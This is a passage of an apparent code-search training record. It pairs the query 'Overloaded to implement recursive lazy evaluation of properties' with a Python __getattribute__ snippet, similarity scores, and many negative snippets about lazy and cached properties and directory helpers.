Settings') #Adds to the directory to create a folder\n \n return path #Returns the folders directory", "def homeDirectory(self):\n\t\treturn self.__homeDirectory", "def main():\n if getattr(sys, 'frozen', False):\n folderCurrent = os.path.dirname(sys.executable)\n else:\n folderCurrent = os.path.abspath(os.path.dirname(__file__))\n\n replaceAll(folderCurrent)", "def this_folder():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n return os.path.dirname(__file__)", "def test_get_qiime_scripts_dir(self):\r\n # get_qiime_scripts_dir will raise an error if it can't find a scripts\r\n # directory.\r\n scripts_dir = get_qiime_scripts_dir()\r\n self.assertTrue(isdir(scripts_dir), \"The QIIME scripts directory does \"\r\n \"not exist: %s\" % scripts_dir)", "def get_xshear_config_dir(run):\n d=get_run_dir(run)\n return os.path.join(d, 'config')", "def stick_everything_into_cwd():\n global DATA_HOME\n\n DATA_HOME = ''", "def here(*args):\n return os.path.join(os.path.dirname(__file__), *args)", "def rdap_info_cache_directory() -> str:\n current_path = Path(__file__).resolve().parent\n return os.path.join(current_path, 'cache', 'rdap')", "def get_work_dir() -> str:\n env_work_dir = os.environ.get(\"AMBIANIC_DIR\", os.getcwd())\n if not env_work_dir:\n env_work_dir = DEFAULT_WORK_DIR\n return env_work_dir", "def base_dir(context):\n return '{}'.format(os.getcwd())", "def get_path() -> str:\n return 
os.path.dirname(os.path.realpath(__file__))", "def get_data_dir():\n return Path(current_app.config[\"USER_DIR\"]) / \"data\"" ]
[ "0.7374015", "0.6456549", "0.6438797", "0.64322007", "0.6419231", "0.6372672", "0.6354939", "0.635183", "0.6337567", "0.6308413", "0.6282552", "0.62738544", "0.62561786", "0.62519723", "0.62439907", "0.6243649", "0.62358207", "0.623114", "0.6230654", "0.6224367", "0.6190694", "0.6167081", "0.6167081", "0.61577827", "0.61252654", "0.61252654", "0.61252654", "0.6124033", "0.6119846", "0.6113667", "0.61089855", "0.60984737", "0.6097553", "0.6083087", "0.6081327", "0.60674155", "0.6062372", "0.60599476", "0.6053184", "0.604932", "0.60475576", "0.6039779", "0.6039779", "0.60395765", "0.60270566", "0.60253453", "0.6009446", "0.59919053", "0.59879935", "0.59873044", "0.59709054", "0.5959175", "0.5952172", "0.59454864", "0.5943719", "0.5935619", "0.5923992", "0.590994", "0.589479", "0.5870464", "0.5869514", "0.58671254", "0.58651894", "0.58573633", "0.58526385", "0.5850947", "0.5821904", "0.5818283", "0.5806523", "0.5803608", "0.58033377", "0.5801693", "0.57951665", "0.5789179", "0.5783691", "0.57818437", "0.5759441", "0.5751627", "0.57513666", "0.574566", "0.57453334", "0.57416075", "0.5739235", "0.57385325", "0.57314503", "0.57308286", "0.57291204", "0.5727077", "0.5717448", "0.5714295", "0.57126766", "0.5708977", "0.5707678", "0.5702565", "0.57019925", "0.5701267", "0.56957626", "0.56951296", "0.56947833", "0.56923836", "0.5681264" ]
0.0
-1
Overloaded to implement recursive lazy evaluation of properties.
def __getattribute__(self, key):\n    from ixian.task import TASKS\n\n    formatted_key = key.lower()\n    if formatted_key in TASKS:\n        task = TASKS[formatted_key]\n        return TaskConfig(task)\n    else:\n        return super(TasksConfig, self).__getattribute__(key)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lazyprop(fn):\n\n @property\n def _lazyprop(self):\n if not hasattr(self, _LAZY_PROP_VALUES):\n setattr(self, _LAZY_PROP_VALUES, {})\n lazy_props_dict = self.__dict__[_LAZY_PROP_VALUES]\n if fn.__name__ not in lazy_props_dict:\n lazy_props_dict[fn.__name__] = fn(self)\n return lazy_props_dict[fn.__name__]\n\n return _lazyprop", "def lazyproperty(f: Callable[..., Any]):\n # pylint: disable=unused-variable\n return property(functools.lru_cache(maxsize=100)(f))", "def test_lazy_evaluation(self):\n pass", "def has_lazyprop(object, property_name):\n if hasattr(object, _LAZY_PROP_VALUES):\n return property_name in object.__dict__[_LAZY_PROP_VALUES]\n return False", "def lazy(fn):\n attr_name = '_lazy_' + fn.__name__\n @property\n def _lazyprop(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fn(self))\n return getattr(self, attr_name)\n return _lazyprop", "def lazy_property_factory(lazy_property):\n def lazy_property_getter(self):\n if not hasattr(self, '_' + lazy_property):\n self.load()\n if not hasattr(self, '_' + lazy_property):\n raise ValueError(\"{} wasn't loaded\".format(lazy_property))\n return getattr(self, '_' + lazy_property)\n\n def lazy_property_setter(self, value):\n setattr(self, '_' + lazy_property, value)\n\n return lazy_property_getter, lazy_property_setter", "def evaluate_lazy_object(obj):\n wrapped_obj = getattr(obj, LAZY_OBJECT_NAME, None)\n if wrapped_obj is None:\n # if it isn't a lazy object then just return the original object...\n return obj\n if wrapped_obj is uninitialized_lazy_object:\n # if it is a lazy object but, hasn't been initialized yet\n # then initialize it & return it\n obj._setup()\n return getattr(obj, LAZY_OBJECT_NAME)\n # return the lazy object...\n return wrapped_obj", "def cached_property(f):\r\n def get(self):\r\n try:\r\n return self._property_cache[f]\r\n except AttributeError:\r\n self._property_cache = {}\r\n x = self._property_cache[f] = f(self)\r\n return x\r\n except KeyError:\r\n x = self._property_cache[f] = f(self)\r\n return x\r\n \r\n return property(get)", "def lazy_properties(*lazy_properties):\n def lazy_property_factory(lazy_property):\n \"\"\"Create properties that perform lazy loading of attributes.\"\"\"\n def lazy_property_getter(self):\n if not hasattr(self, '_' + lazy_property):\n self.load()\n if not hasattr(self, '_' + lazy_property):\n raise ValueError(\"{} wasn't loaded\".format(lazy_property))\n return getattr(self, '_' + lazy_property)\n\n def lazy_property_setter(self, value):\n setattr(self, '_' + lazy_property, value)\n\n return lazy_property_getter, lazy_property_setter\n\n def wrap_dataset(dataset):\n if not issubclass(dataset, InMemoryDataset):\n raise ValueError(\"Only InMemoryDataset supports lazy loading\")\n\n # Attach the lazy loading properties to the class\n for lazy_property in lazy_properties:\n setattr(dataset, lazy_property,\n property(*lazy_property_factory(lazy_property)))\n\n # Delete the values of lazy properties when serializing\n if not hasattr(dataset, '__getstate__'):\n def __getstate__(self):\n serializable_state = self.__dict__.copy()\n for lazy_property in lazy_properties:\n attr = serializable_state.get('_' + lazy_property)\n # Iterators would lose their state\n if isinstance(attr, collections.Iterator):\n raise ValueError(\"Iterators can't be lazy loaded\")\n serializable_state.pop('_' + lazy_property, None)\n return serializable_state\n setattr(dataset, '__getstate__', __getstate__)\n\n return dataset\n return wrap_dataset", "def clear_lazyprop(object, 
property_name):\n assert isinstance(property_name, str)\n\n if _LAZY_PROP_VALUES in object.__dict__:\n if property_name in object.__dict__[_LAZY_PROP_VALUES]:\n del object.__dict__[_LAZY_PROP_VALUES][property_name]\n\n if _LAZY_PROP_SUBSCRIBERS in object.__dict__:\n if property_name in object.__dict__[_LAZY_PROP_SUBSCRIBERS]:\n for fn in object.__dict__[_LAZY_PROP_SUBSCRIBERS][property_name]:\n fn(object)", "def properties(expression, stream):\n def index(expression, stream):\n item = expression.children[0].children[0]\n for node in stream:\n if isinstance(node, Object):\n yield node.get(item, null)\n elif not optional(expression):\n itype = expression.children[0].data\n if itype == 'cname':\n itype = 'string'\n raise TypeError(\n 'cannot index {} with {}'.format(\n node.__class__.__name__, itype\n )\n )\n\n for expression in expression.children:\n stream = index(expression, stream)\n\n for node in stream:\n yield node", "def cached_property(func):\n return Property(fget=func, cached=True)", "def _get_property(self, xpaths):\n result = None\n for xpath in xpaths:\n result = self[xpath]\n if len(result) > 0:\n break\n\n return result", "def clear_all_lazyprops(object):\n if _LAZY_PROP_VALUES in object.__dict__:\n del object.__dict__[_LAZY_PROP_VALUES]\n\n if _LAZY_PROP_SUBSCRIBERS in object.__dict__:\n for subscribers in object.__dict__[_LAZY_PROP_SUBSCRIBERS].values():\n for fn in subscribers:\n fn(object)", "def _cache_property_mutator(self, name):\n try:\n methods = self.instance_properties[name]\n except KeyError:\n methods = self._cache_property_methods(name)\n self.instance_properties[name] = methods\n if methods:\n return methods[1]\n return None", "def subscribe_to_lazy_prop(object, property_name, on_change_func):\n assert isinstance(property_name, str)\n\n if not hasattr(object, _LAZY_PROP_SUBSCRIBERS):\n setattr(object, _LAZY_PROP_SUBSCRIBERS, defaultdict(lambda: set()))\n\n object.__dict__[_LAZY_PROP_SUBSCRIBERS][property_name].add(on_change_func)", "def child_properties(self):\n response = check_defined(self, inspect.stack()[0][3])\n if not response:\n return response\n children = self.se.property_only_graph.successors(self.uri)\n result = restructure_output(self,\n children,\n inspect.stack()[0][3],\n self.output_type)\n return result", "def __getattribute__(self, name):\n if name == '__root__' or name == '__pepth__':\n return list.__getattribute__(self, name)\n if not name.endswith('___') and name.startswith('__') and name.endswith('__'):\n raise AttributeError('plist objects cannot call reserved members of their elements: \\'%s\\'' % name)\n try:\n return plist.__getattr__(self, name)\n except AttributeError:\n pass\n if ((name.startswith('__') and name.endswith('___'))\n or (not name.startswith('__') and name.endswith('_'))):\n # Allows calling one level deeper by adding '_' to the end of a property name. 
This is recursive, so '__' on the end goes two levels deep, etc.\n # Works for both regular properties (foos.bar_) and private properties (foos.__len___).\n try:\n starting_unders = 2 if name.startswith('__') else 0 # We don't care about single starting underscores for this count\n ending_unders = 0\n for i in range(len(name) - 1, 0, -1):\n if name[i] == '_':\n ending_unders += 1\n else:\n break\n ending_unders -= starting_unders\n return plist.__getattr__(self, name[:-ending_unders], _pepth=ending_unders)\n except AttributeError:\n pass\n try:\n if plist.all(self, hasattr, name):\n return plist([getattr(x, name) for x in self], root=self.__root__)\n return plist([x[name] for x in self], root=self.__root__)\n except Exception as e:\n raise AttributeError('plist children raised exceptions attempting to get attribute \\'%s\\' (%s)' % (name, str(e)))", "def propertyListGenerator(name, cls):\n\n memo = dict()\n\n def propertyValueFromNodeGetter(instance):\n \"\"\"Get the actual property value from an instance.\n\n instance - a ComputedGraph location that the property is tied to.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n else:\n subspace.keyspace.ensureSubscribed()\n\n val = subspace.value\n\n if val is None:\n return default()\n\n return val[0]\n\n def propertyValueFromNodeSetter(instance, val):\n \"\"\"Set the property value 'name' in instance 'instance' to 'val'\n\n We must be in 'synchronous' mode for this to work. We'll load the\n keyspace if its not loaded.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n\n if subspace.value != (val,):\n subspace.value = (val,)\n\n def nodeGetter(instance):\n \"\"\"Produces a CGSS.Node.Node object corresponding to this property's value.\n\n We use the hash of the result of the documentGetter function to decide which keyspace\n we want to use, and then we hash the pair (instance, name) to decide which key\n to use.\n \"\"\"\n if (instance, name) not in memo:\n subspace = subspaceFunction(instance)\n\n if subspace is None:\n assert False, \"Instance %s produced an empty subspace\" % instance\n\n memo[(instance,name)] = subspace.subspace(name)\n return memo[(instance,name)]\n\n return [\n (name, ComputedGraph.Property(propertyValueFromNodeGetter,propertyValueFromNodeSetter))\n ]", "def _cache_property_accessor(self, name):\n try:\n methods = self.instance_properties[name]\n except KeyError:\n methods = self._cache_property_methods(name)\n self.instance_properties[name] = methods\n if methods:\n return methods[0]\n return None", "def _query_properties(self, props=None, depth=0):\n root = None\n # build the propfind request\n if props is not None and len(props) > 0:\n prop = dav.Prop() + props\n root = dav.Propfind() + prop\n\n return self._query(root, depth)", "def getPropertiesAll():", "def load(self):\n for prop in self.properties:\n try:\n value = getattr(self, prop)\n self._prop_dict[prop] = value\n except AttributeError as ate:\n pass", "def _determine_properties(self, paramdict):\n for var in paramdict:\n if is_dimensionless(paramdict[var]):\n self._all_params_unit[var] = \"none\"\n yield lems.Property(var, \"none\")\n else:\n dim = _determine_dimension(paramdict[var])\n self._all_params_unit[var] = dim\n yield lems.Property(var, dim)", "def 
load_recursive_state_dict(x, obj):\n if hasattr(obj, 'load_state_dict'):\n obj.load_state_dict(x)\n if isinstance(x, (tuple, list)):\n for xx, oo in zip(x, obj):\n load_recursive_state_dict(xx, oo)\n if isinstance(x, dict):\n for k in objs.keys():\n load_recursive_state_dict(xx[k], oo[k])", "def test_get_all_ancestor_properties(self):\n pass", "def __(self):\n self.__pepth__ = self.pdepth(True)\n return self", "def property_setup(self, properties):\n return properties", "def _eval_shallow(servicedef, obj, need_copy=False):\n\n # _eval_shallow() resolves $ref and $merge to their values in\n # source and with_. This is a *shallow* evaluation in that embedded\n # $ref or $merge at deeper levels are *not* resolved.\n #\n # For example, the following will be resolved:\n # { $ref: ... }\n # { $merge: ... }\n #\n # But the following will *not* be resolved\n # { type: object,\n # properties: { x: { $ref: ... } } }\n #\n # Need to loop in the event that a $ref resolves to another $ref\n # or a $ref to a $merge:\n #\n # { $ref: <target1> } --> { $ref: <target2> } --> { <value2> }\n #\n\n # Minimize copies so that we don't bloat memory\n done = False\n is_copy = False\n while not done:\n if '$merge' in obj:\n with Parser(obj['$merge'], 'eval_shallow') as merge_parser:\n merge_source = merge_parser.parse('source', save=False,\n required=True)\n merge_with = merge_parser.parse('with', save=False,\n required=True)\n\n # This always returns a copy\n obj = json_merge_patch(servicedef, merge_source, merge_with)\n is_copy = True\n\n elif '$ref' in obj:\n if len(list(obj.keys())) != 1:\n raise ParseError(\n \"$ref object may not have any other properties\", obj)\n\n sch = servicedef.find(obj['$ref'])\n obj = sch.input\n is_copy = False\n\n else:\n done = True\n\n if not is_copy and need_copy:\n obj = copy.copy(obj)\n\n return obj", "def build_property(value_token: ValueToken) -> property:\n def caller(_: Any) -> Any:\n return value_token.get_value()\n return property(caller)", "def properties(self):\n raise NotImplementedError", "def _lock_property(self, **properties):\n self._property_lock = properties\n try:\n yield\n finally:\n self._property_lock = {}", "def go_next(context: Context) -> None:\n\n state = context.decode_state()\n if not state:\n print('Selected frame is not in a property.')\n return\n\n # If execution reached the part of the code where the property is about to\n # return a cached result, just let it return.\n if state.in_memoization_lookup:\n gdb.execute('finish')\n return\n\n scope_state, current_expr = state.lookup_current_expr()\n\n if current_expr is None:\n # There are only two possible causes for no currently evaluating\n # expressions: either the property just started (root expression\n # evaluation is ahead), either it is about to return (root expr. 
eval.\n # is behind).\n bp_group = break_scope_start(context, state.property_scope.scope,\n from_line_no=state.line_no)\n\n if bp_group:\n # The first expression is ahead: resume execution until we reach\n # it.\n gdb.execute('continue')\n else:\n gdb.execute('finish')\n\n else:\n # Depending on the control flow behavior of the currently running\n # expression, the next step can be either its parent expression or any\n # of its sub-expressions.\n next_slocs_candidates = []\n\n # First look for the point where the current expression terminates its\n # evaluation.\n next_slocs_candidates.append(current_expr.done_event.line_no)\n\n # Now look for the starting point for all sub-expressions\n for subexpr in current_expr.start_event.sub_expr_start:\n next_slocs_candidates.append(subexpr.line_no)\n\n BreakpointGroup(context, next_slocs_candidates)\n gdb.execute('continue')\n\n new_current_expr = None\n new_expr = None\n\n new_state = context.decode_state()\n if new_state:\n _, new_current_expr = new_state.lookup_current_expr()\n if current_expr:\n new_expr = new_state.lookup_expr(current_expr.expr_id)\n\n # If we just finished the evaluation of an expression, display its value\n if new_expr and new_expr.is_done:\n assert new_state is not None\n print('{} evaluated to: {}'.format(\n expr_repr(new_expr),\n new_expr.read(new_state.frame)\n ))\n\n # Display the expression of most interest, if any\n if new_current_expr:\n print('')\n print('Now evaluating {}'.format(expr_repr(new_current_expr)))", "def Property(name):\n\n attr_name = \"__\" + name\n\n def get(self):\n try:\n return self.__dict__[attr_name]\n except KeyError:\n raise AttributeError, name\n\n def set(self, value):\n if attr_name not in self.__dict__ \\\n or self.__dict__[attr_name] != value:\n self.__dict__[attr_name] = value\n self.is_modified = True\n\n return property(get, set)", "def cached_property(expensive_function):\n @property\n def caching_function(self):\n cacheName = f\"__cache__{expensive_function.__name__}\"\n \n\t\t\n try: # check if the cache has been initialized\n cacheExists = True\n cache = getattr(self, cacheName)\n except AttributeError:\n cacheExists = False\n cache = None\n \n\t\t# Check if the cache is valid (not None), caching is requested, and that it exists\n if ( cache is not None ) and ( self.withCaching == True ) and (cacheExists == True):\n return cache\n else:\n\t\t\t#worst case, now we have to compute the quantity\n computed = expensive_function(self)\n setattr(self, cacheName, computed)\n return computed\n \n return caching_function", "def getProperty(propname):", "def cached_property(fun):\n @functools.wraps(fun)\n def get(self):\n try:\n return self._cache[fun]\n except AttributeError:\n self._cache = {}\n except KeyError:\n pass\n ret = self._cache[fun] = fun(self)\n return ret\n return property(get)", "def test_properties_get(self):\n pass", "def auto_property_list(self, prop_reader_cls, offset_addr, n_offsets, n_items_per_sub_list=0, sub_list_prefix=''):\n prop_reader = prop_reader_cls()\n use_sub_lists = n_items_per_sub_list > 0\n prop_list = {}\n\n # If we don't have sub lists in the property list, just use the main prop_list as the current sub list\n if use_sub_lists:\n sub_list = None\n n_sub_lists = (n_offsets - 1) // n_items_per_sub_list\n else:\n sub_list = prop_list\n n_sub_lists = 1\n\n # Initialize read\n data_addr = offset_addr + n_offsets * 4\n offset = self.uint32()\n\n for prop_id in range(n_offsets - 1):\n # Maybe update sub list\n if use_sub_lists:\n sub_list_id = prop_id // 
n_sub_lists\n prop_id = prop_id % n_sub_lists\n\n if prop_id == 0:\n prop_list[f'{sub_list_prefix}{sub_list_id}'] = sub_list = {}\n\n # Read the property\n next_offset = self.uint32()\n with self.offset_context(data_addr + offset):\n data = prop_reader.read(prop_id, self, next_offset - offset)\n sub_list.update(data)\n\n offset = next_offset\n\n # Set the pointer after the data\n self.seek(data_addr + offset)\n\n return prop_list", "def iterProperties(cls):\n meta = cls.staticMetaObject\n for i in range(meta.propertyCount()):\n yield meta.property(i).name()", "def getParentProperty(self, propertyName):\n return [getattr(fp, propertyName) for dp in self.deblendedParents]", "def useProperties(cls):\n def getter(name):\n def get(self):\n return self.property(name)\n return get\n def setter(name):\n def set(self, value):\n return self.setProperty(name, value)\n return set\n for name in iterProperties(cls):\n setattr(cls, name, property(getter(name), setter(name)))\n return cls", "def property_autoparse(self, candidate_pattern, patterns):\n properties = None\n candidates = self.find_objects(regex=candidate_pattern)\n if len(candidates):\n properties = []\n else:\n return properties\n for candidate in candidates:\n properties.append(self.match_to_dict(line=candidate, patterns=patterns))\n return properties", "def __iter__(self):\n\n result = []\n\n # d - dict, p - path (keys sequence)\n def recurs_iter(d, p=None):\n p = p or []\n\n # k - key, v - value\n for k, v in iteritems(d):\n next_p = p + [k]\n if isinstance(v, dict):\n recurs_iter(v, next_p)\n else:\n result.append(tuple(next_p))\n\n recurs_iter(self.__dict__)\n\n return iter(result)", "def _cache_property_methods(self, name):\n if name.endswith(\"_\"):\n # If the requested name ends with _, that's a marker that we're\n # dealing with a method call, not a property, so we can shortcut\n # the process.\n methods = None\n else:\n # Check 1: Does the class respond to the property?\n responds = libobjc.class_getProperty(self, name.encode(\"utf-8\"))\n\n # Check 2: Does the class have an instance method to retrieve the given name\n accessor = self._cache_method(name)\n\n # Check 3: Is there a setName: method to set the property with the given name\n mutator = self._cache_method(\"set\" + name[0].title() + name[1:] + \":\")\n\n # Check 4: Is this a forced property on this class or a superclass?\n forced = False\n superclass = self\n while superclass is not None:\n if name in superclass.forced_properties:\n forced = True\n break\n superclass = superclass.superclass\n\n # If the class responds as a property, or it has both an accessor *and*\n # and mutator, then treat it as a property in Python.\n if responds or (accessor and mutator) or forced:\n methods = (accessor, mutator)\n else:\n methods = None\n return methods", "def __getitem__(self, key):\n key_split = key.split('.')\n last_index = len(key_split) - 1\n current = self\n for i, k in enumerate(key_split):\n try:\n current = getattr(current, k)\n except KeyError:\n if i == last_index:\n raise\n temp_dict = DotDictWithAcquisition()\n temp_dict.__dict__['_parent'] = weakref.proxy(current)\n current = temp_dict\n return current", "def get_properties():", "def test_dotted_named_entities_circular_references():\n from tests.dottedname.foo.bar.bop import Property\n\n p = Property(\n name='outer',\n nested={\n 'properties': [\n Property(name='inner')\n ]\n }\n )\n assert p\n assert isinstance(p.nested.properties, list)\n assert p.nested.properties[0].name == 'inner'", "def properties_owns(cls, 
*args):\n return cls.graph_traversal(\n None, None, Bytecode()).properties_owns(*args)", "def is_lazy(self) -> bool:\n return self._is_lazy", "def __iter__(self):\n element = self\n\n while element.HasField(\"pathtype\"):\n yield element\n\n if element.HasField(\"nested_path\"):\n element = element.nested_path\n else:\n break", "def get(obj, path):\n right = path\n cur = obj\n while right:\n left, right = partition(right)\n if isinstance(cur, dict):\n cur = cur.get(left)\n elif isinstance(cur, (list, tuple)):\n left = int(left)\n cur = cur[left] if left < len(cur) else None\n return cur", "def __iter__(self):\n n = self.getRoot()\n while n.left is not None:\n n = n.left\n while True:\n yield n.value\n n = n._successor()\n if n is None:\n break", "def __call__(self, arg):\n return self.get_property(arg)", "def max_recursion_depth(self) -> ConfigNodePropertyInteger:\n return self._max_recursion_depth", "def memoized_property(method):\n\n method_name = method.__name__\n attr_name = \"_\" + method_name\n undefined = object()\n\n def wrapped(self):\n attr = getattr(self, attr_name, undefined)\n if attr is undefined:\n attr = method(self)\n setattr(self, attr_name, attr)\n return attr\n\n wrapped = property(wrapped)\n return wrapped", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def __iter__(self):\n\n if not self.left and not self.right:\n raise StopIteration\n return self.children().__iter__()\n\n # def SP_traverse(self):\n \"\"\" Return a string of series-parallel partial order.\n\n A recursion way to implement in-order traversal.\n\n return\n -------\n A simple formula of series-parallel partial order\n\n \"\"\"\n # if self.left != None and self.right == None:\n # return str(self.left.SP_traverse()) + \" \" + str(self.data)\n #\n # if self.right != None and self.left == None:\n # return str(self.data) + \" \" + str(self.right.SP_traverse())\n #\n # if self.left != None and self.right != None:\n # return str(self.left.SP_traverse()) + \" \" + str(self.data) + \" \" + str(self.right.SP_traverse())\n #\n # if self.left == None and self.right == None:\n # return str(self.data)", "def _evaluate(prop_name, prop_value, binary_info):\n\n def compatible_prop(setting_value, _prop_value):\n return (_prop_value == setting_value) or (_prop_value == \"None\" and setting_value is None)\n\n # TODO: Necessary to generalize this query evaluation to include all possible fields\n info_settings = binary_info.get(\"settings\", {})\n info_options = binary_info.get(\"options\", {})\n\n if not prop_name.startswith(\"options.\"):\n return compatible_prop(info_settings.get(prop_name), prop_value)\n else:\n prop_name = prop_name[len(\"options.\"):]\n return compatible_prop(info_options.get(prop_name), prop_value)", "def get_next(self):\n\n pos_options = []\n kw_options = {}\n for opt in self.pos_options:\n if isinstance(opt, LazyObject):\n pos_options.append(opt.get_current())\n elif isinstance(opt, LazyExpression):\n pos_options.append(opt.eval())\n else:\n pos_options.append(opt)\n\n for opt_k, opt_v in self.kw_options.items():\n if isinstance(opt_v, LazyObject):\n kw_options[opt_k] = opt.get_current()\n elif isinstance(opt_v, LazyExpression):\n kw_options[opt_k] = opt_v.eval()\n else:\n kw_options[opt_k] = opt_v\n\n self.current_obj = self.cls(*pos_options, **kw_options)\n return self.current_obj", "def callPropertyGet(self, name = \"__value\", index = None):\n\t\tif name == 'IID':\n\t\t\treturn CSLValue(typeid = \"string\", 
value = self.callerInfo.IID)\n\t\tEntry = self.vtbl['p_' + name + \"_get\"]\n\t\t#localTbl = { 'vars':{}, 'status':0, 'props':{}, 'alias':{}, 'persistent':{}, 'instance':{}}\n\t\tpropEntry = Entry.parent\n\t\tprmName = propEntry.data['prm']\n\t\tlocalTbl = self.CSLCreateLocalTbl({}, {}, {}, copy.copy(propEntry.data['persistent']), copy.copy(propEntry.data['instance']))\n\t\tif prmName != \"\":\n\t\t\tif index == None:\n\t\t\t\tdefault = propEntry.data['default']\n\t\t\t\tif default != \"\":\n\t\t\t\t\tdefault = self.CSLCheckValue(default, localTbl)\n\t\t\t\telse:\n\t\t\t\t\tdefault = CSLValue(typeid = \"NULL\", value = None)\n\t\t\telse:\n\t\t\t\tdefault = index\n\n\t\t\tlocalTbl['vars'][prmName] = default\n\n\t\tself.procStack.append('p_' + name + '_get')\n\t\tself.lastLTbl = self.CSLInterpreter(Entry.child, localTbl)\n\t\tself.procStack.pop()\n\t\tl = self.lastLTbl['vars']\n\n\t\tself.debug(DEBUG_CALL, \"\\n\\nGetProp result: (\", name, \")\", l, \"haskey:\", l.has_key(name))\n\n\t\tif l != None and l.has_key(name):\n\t\t\tself.debug(DEBUG_CALL, \"Get Property return:\", l[name])\n\t\t\treturn copy.deepcopy(l[name])\n\t\telse:\n\t\t\treturn CSLValue(typeid = \"NULL\", value = None)", "def test_cached_property():\n new_value = \"99999\"\n\n class DummyClass:\n def __init__(self):\n self.value = \"11111\"\n\n def change_value_in_instance(self, value):\n self.value = value\n\n @cached_property\n def test_property(self):\n return self.value\n\n @property\n def test_uncached_property(self):\n return self.value\n\n testClass = DummyClass()\n first_cached_test_property = testClass.test_property\n first_uncached_test_property = testClass.test_uncached_property\n testClass.change_value_in_instance(new_value)\n second_cached_test_property = testClass.test_property\n second_uncached_test_property = testClass.test_uncached_property\n\n assert first_cached_test_property == second_cached_test_property\n assert first_cached_test_property == \"11111\"\n\n assert first_uncached_test_property != second_uncached_test_property\n assert first_uncached_test_property == \"11111\"\n assert second_uncached_test_property == \"99999\"", "def process_property(self, resources, resource, model, prop, context):\n pass", "def lazy(func):\n\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n name = \"_\" + func.__name__\n try:\n return getattr(self, name)\n except AttributeError:\n value = func(self, *args, **kwargs)\n setattr(self, name, value)\n return value\n\n return wrapper", "def Property(\tsubspaceFunction = lambda instance: instance.sharedStateSubspace,\n default = lambda: None,\n exposeToProtocol = False\n ):\n def propertyListGenerator(name, cls):\n \"\"\"Generates a list of (name, ComputedGraph.Property) objects corresponding to\n this property object.\"\"\"\n\n memo = dict()\n\n def propertyValueFromNodeGetter(instance):\n \"\"\"Get the actual property value from an instance.\n\n instance - a ComputedGraph location that the property is tied to.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n else:\n subspace.keyspace.ensureSubscribed()\n\n val = subspace.value\n\n if val is None:\n return default()\n\n return val[0]\n\n def propertyValueFromNodeSetter(instance, val):\n \"\"\"Set the property value 'name' in instance 'instance' to 'val'\n\n We must be in 'synchronous' mode for this to work. 
We'll load the\n keyspace if its not loaded.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n\n if subspace.value != (val,):\n subspace.value = (val,)\n\n def nodeGetter(instance):\n \"\"\"Produces a CGSS.Node.Node object corresponding to this property's value.\n\n We use the hash of the result of the documentGetter function to decide which keyspace\n we want to use, and then we hash the pair (instance, name) to decide which key\n to use.\n \"\"\"\n if (instance, name) not in memo:\n subspace = subspaceFunction(instance)\n\n if subspace is None:\n assert False, \"Instance %s produced an empty subspace\" % instance\n\n memo[(instance,name)] = subspace.subspace(name)\n return memo[(instance,name)]\n\n return [\n (name, ComputedGraph.Property(propertyValueFromNodeGetter,propertyValueFromNodeSetter))\n ]\n\n return ComputedGraph.PropertyMaker(propertyListGenerator, exposeToProtocol)", "def __get__(self,obj,objtype):\n gen = super(Dynamic,self).__get__(obj,objtype)\n\n if not hasattr(gen,'_Dynamic_last'):\n return gen\n else:\n return self._produce_value(gen)", "def make_recursive_propdict(wcroot,\r\n output,\r\n rex = re.compile(\"Properties on '(.*)':\")):\r\n lines = filter(None, output.split('\\n'))\r\n pdict = {}\r\n while lines:\r\n line = lines.pop(0)\r\n m = rex.match(line)\r\n if not m:\r\n raise ValueError, \"could not parse propget-line: %r\" % line\r\n path = m.groups()[0]\r\n wcpath = wcroot.join(path, abs=1)\r\n propnames = []\r\n while lines and lines[0].startswith(' '):\r\n propname = lines.pop(0).strip()\r\n propnames.append(propname)\r\n assert propnames, \"must have found properties!\"\r\n pdict[wcpath] = svncommon.PropListDict(wcpath, propnames)\r\n return pdict", "def _compute_invalidation_scope_recursive(request, result, meta, source_type, target_type, simulated_prop):\n if 'calculatedProperty' in meta: # we cannot patch calc props, so behavior here is irrelevant\n return\n elif meta['type'] == 'object':\n if 'properties' not in meta:\n return # sometimes can occur (see workflow.json in fourfront) - nothing we can do\n for sub_prop, sub_meta in meta['properties'].items():\n _compute_invalidation_scope_recursive(request, result, sub_meta, source_type, target_type,\n '.'.join([simulated_prop, sub_prop]))\n elif meta['type'] == 'array':\n sub_type = meta['items']['type']\n if sub_type == 'object':\n if 'properties' not in meta['items']:\n return # sometimes can occur (see workflow.json in fourfront) - nothing we can do\n for sub_prop, sub_meta in meta['items']['properties'].items():\n _compute_invalidation_scope_recursive(request, result, sub_meta, source_type, target_type,\n '.'.join([simulated_prop, sub_prop]))\n else:\n _compute_invalidation_scope_base(request, result, source_type, target_type, simulated_prop)\n else:\n _compute_invalidation_scope_base(request, result, source_type, target_type, simulated_prop)", "def properties(self):", "def properties(self):", "def properties(self):", "def test_lazy_base_class(self):\n\n class Base(object):\n def base_method(self):\n pass\n\n class Klazz(Base):\n pass\n\n t = lazy(lambda: Klazz(), Klazz)()\n self.assertTrue('base_method' in dir(t))", "def deepget(self, key):\n if DEBUG: print(repr(self))\n if '.' 
